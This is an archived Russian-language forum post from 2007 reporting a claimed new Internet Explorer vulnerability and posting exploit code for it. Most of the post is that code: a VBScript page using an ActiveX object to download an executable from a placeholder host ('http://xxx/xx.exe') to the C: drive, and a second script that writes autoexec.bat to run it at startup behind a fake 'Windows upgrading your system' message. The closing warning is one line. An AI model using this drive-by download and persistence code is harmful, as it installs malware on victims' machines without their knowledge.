PDA

Просмотр полной версии : Вирусная активность на 16 августа 2007..



Граф Лапшин
16.08.2007, 21:30
От хак группы Nuclear-wind стало известно о новой бреше в InternetExplorer. На секлабе молчание..
Обновлений на сегодняшнее утро небыло...
привожу эксплоит:

если правильно воспользоваться то можно скачать с инета любой файл...


<object classid='clsid:6BA21C22-53A5-463F-BBE8-5CF7FFA0132B' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
Sub tryMe
On Error Resume Next
test.HttpDownloadFile "http://xxx/xx.exe", "c:\1.exe"
MsgBox("Exploit completed!")
End Sub
</script>
</span>
</code></pre>

А этим кодом прописать его в автозагрузку...


<html>
<body>
<script language ="VBScript">
sub destruct
set autoexec=fs.CreateTextFile("c:\autoexec.bat")
autoexec.WriteLine "@cls"
autoexec.WriteLine "@echo Windows upgrading your system..."
autoexec.WriteLine "@1.exe"

autoexec.close 'Закроем Autoexec.bat
end sub
destruct
</script>
</body>
</html>

Будте аккуратны!! Воздержитесь от посещений неизвестных сайтов..